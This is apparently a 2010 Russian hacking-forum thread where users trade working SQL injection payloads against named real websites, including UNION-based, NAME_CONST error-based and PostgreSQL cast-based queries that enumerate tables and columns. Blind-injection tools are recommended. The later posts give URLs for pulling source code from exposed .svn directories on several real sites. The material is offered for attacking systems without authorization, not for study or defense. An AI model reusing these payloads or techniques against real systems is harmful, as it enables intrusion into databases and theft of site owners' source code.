 |
|
31.01.2010, 18:33
|
|
Новичок
Регистрация: 25.12.2009
Сообщений: 16
С нами:
8620050
Репутация:
0
|
|
Не пойму,при переборе колонок на 5 значение вылетает пустая страничка,как поступить ????
Сама sql http://www.ollis.ru/index.php?rest=1')+AND+1=2+UNION+SELECT+0,1,2,3,4, 5%23
|
|
|
31.01.2010, 18:36
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Сообщение от YuNi|[c
спс но всетаки я немного не понял запрос.
если например мне надо найти колонки с таблицы usage_privileges
http://bb.focus.de/focus/viewtopic.php?highlight=&t=102681+and+1=cast((SELE CT+table_name+from+information_schema.tables+limit +1+offset+3)+as+int)--
так какой будеть запрос?
bb.focus.de/focus/viewtopic.php?highlight=&t=102681+and+1=cast((SELE CT+column_name+from+information_schema.columns+whe re+table_name=chr(117)||chr(115)||chr(97)||chr(103 )||chr(101)||chr(95)||chr(112)||chr(114)||chr(105) ||chr(118)||chr(105)||chr(108)||chr(101)||chr(103) ||chr(101)||chr(115)+limit+1+offset+0)+as+int)--
Сообщение от MastaBass1
Не пойму,при переборе колонок на 5 значение вылетает пустая страничка,как поступить ????
Сама sql http://www.ollis.ru/index.php?rest=1')+AND+1=2+UNION+SELECT+0,1,2,3,4, 5%23
http://www.ollis.ru/index.php?rest=-1') union select * FROM (select * FROM (select NAME_CONST((select column_name FROM information_schema.columns LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select column_name FROM information_schema.columns LIMIT 1), 14)e) b)a--+
Последний раз редактировалось jokester; 31.01.2010 в 18:53..
|
|
|
|
31.01.2010, 18:57
|
|
Новичок
Регистрация: 25.12.2009
Сообщений: 16
С нами:
8620050
Репутация:
0
|
|
Сообщение от jokester
http://www.ollis.ru/index.php?rest=-1') union select * FROM (select * FROM (select NAME_CONST((select column_name FROM information_schema.columns LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select column_name FROM information_schema.columns LIMIT 1), 14)e) b)a--+
А что это?))
|
|
|
|
31.01.2010, 18:58
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Сообщение от MastaBass1
А что это?))
Это вывод с твоей скули. Читай статьи
|
|
|
|
31.01.2010, 19:02
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
Сообщение от jokester
bb.focus.de/focus/viewtopic.php?highlight=&t=102681+and+1=cast((SELE CT+column_name+from+information_schema.columns+whe re+table_name=chr(117)||chr(115)||chr(97)||chr(103 )||chr(101)||chr(95)||chr(112)||chr(114)||chr(105) ||chr(118)||chr(105)||chr(108)||chr(101)||chr(103) ||chr(101)||chr(115)+limit+1+offset+0)+as+int)--
http://www.ollis.ru/index.php?rest=-1') union select * FROM (select * FROM (select NAME_CONST((select column_name FROM information_schema.columns LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select column_name FROM information_schema.columns LIMIT 1), 14)e) b)a--+
бло ппц
сорри за тупой вопрос
таблицы норм выводится через limit offset но на колонки ругается пххп://bb.focus.de/focus/viewtopic.php?highlight=&t=102681+and+1=cast((SELE CT+column_name+from+infor mation_schema.columns+where+table_name=chr(39)||pg _user||chr(39)+limit+1+offset+0)+as+int)--
что не знал вообше про Postgresql ))
Сообщение от Pashkela
имя таблицы лучше писать в сhr(), а не просто кавычки чарить, по аналогии с MySql, а у тебя гибрид какой-то конгениальный)
))
спс всем за ответы
|
|
|
|
31.01.2010, 19:05
|
|
Новичок
Регистрация: 10.06.2009
Сообщений: 11
С нами:
8904852
Репутация:
0
|
|
Нашол да одной социалке скулу, панголин сказал что это mysql 5 базы сказал,операционку,пользов ателя, но неможет подобрать таблицы, вернее их имена и колонки. Пробывал вручную но там blind sql injection. Как можно определить таблицы с базы и колнки таблиц? Кстате на ковычку ругается:
PHP код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\' order by auktionid DESC LIMIT 1' at line 1
Пробывал перекодировать но все равно ругается. |
|
|
|
31.01.2010, 19:09
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
Сообщение от Xeleon
Нашол да одной социалке скулу, панголин сказал что это mysql 5 базы сказал,операционку,пользов ателя, но неможет подобрать таблицы, вернее их имена и колонки. Пробывал вручную но там blind sql injection. Как можно определить таблицы с базы и колнки таблиц? Кстате на ковычку ругается:
PHP код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\' order by auktionid DESC LIMIT 1' at line 1
Пробывал перекодировать но все равно ругается. если там блинд юзай прогу toolza 1.0 от пашкела или marathon tools
эти как раз для блинд скули удобно
Кстати кто знает какой нит прогу encoder/decoder CHAR для mssql/postgresql/mysql
ручками долго кодировать
|
|
|
|
31.01.2010, 19:10
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Сообщение от Xeleon
Нашол да одной социалке скулу, панголин сказал что это mysql 5 базы сказал,операционку,пользов ателя, но неможет подобрать таблицы, вернее их имена и колонки. Пробывал вручную но там blind sql injection. Как можно определить таблицы с базы и колнки таблиц? Кстате на ковычку ругается:
PHP код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\' order by auktionid DESC LIMIT 1' at line 1
Пробывал перекодировать но все равно ругается. Через NAME_CONST можно сделать вывод. Способ описывал QWAZAR. Либо через блинд по символу определять. Скинь ссылку в личку.
|
|
|
|
31.01.2010, 19:21
|
|
Новичок
Регистрация: 11.01.2009
Сообщений: 5
С нами:
9120767
Репутация:
0
|
|
Извинит вопрос не по теме.Но все же задам.Кто нибудь может рассказать как можно получить исходники с помощью svn уязвимости нашел на http://www.wi-fi.org/.svn/entries и еще на kp.ru/.svn/entries может это что дать?В форуме есть по этой уязвимости посты но там не нашел нужной информации.Заранее спасибо,кто поможет!
|
|
|
|
31.01.2010, 19:35
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
aldonin, http://habrahabr.ru/blogs/infosecurity/70330/
Но можно пойти и далее. В той же папке .svn находится директори text-base, в которой лежат последние версии всех файлов, находящихся в репозитории. Картину дополняет так же и то, что файлы имеют не стандартное расширение (например .php), которое позволяет их сразу отправить на интерпретатор, а дополнительное расширение .svn-base, благодаря которому файл отдается запросившему его человеку «как есть», т.е. голый исходный код!
draftcopy.ru/.svn/text-base/index.php.svn-base
Стоит заметить, что описанная картина является идеальной и хоть она и была таковой в большинстве случаев, все же большой процент исходных кодов не удалось получить по тем или иным причинам.
Так что так. Поковыряй, может найдешь чего интересного
http://www.wi-fi.org/.svn/text-base/info.php.svn-base
http://kp.ru/.svn/text-base/autohandler.svn-base |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
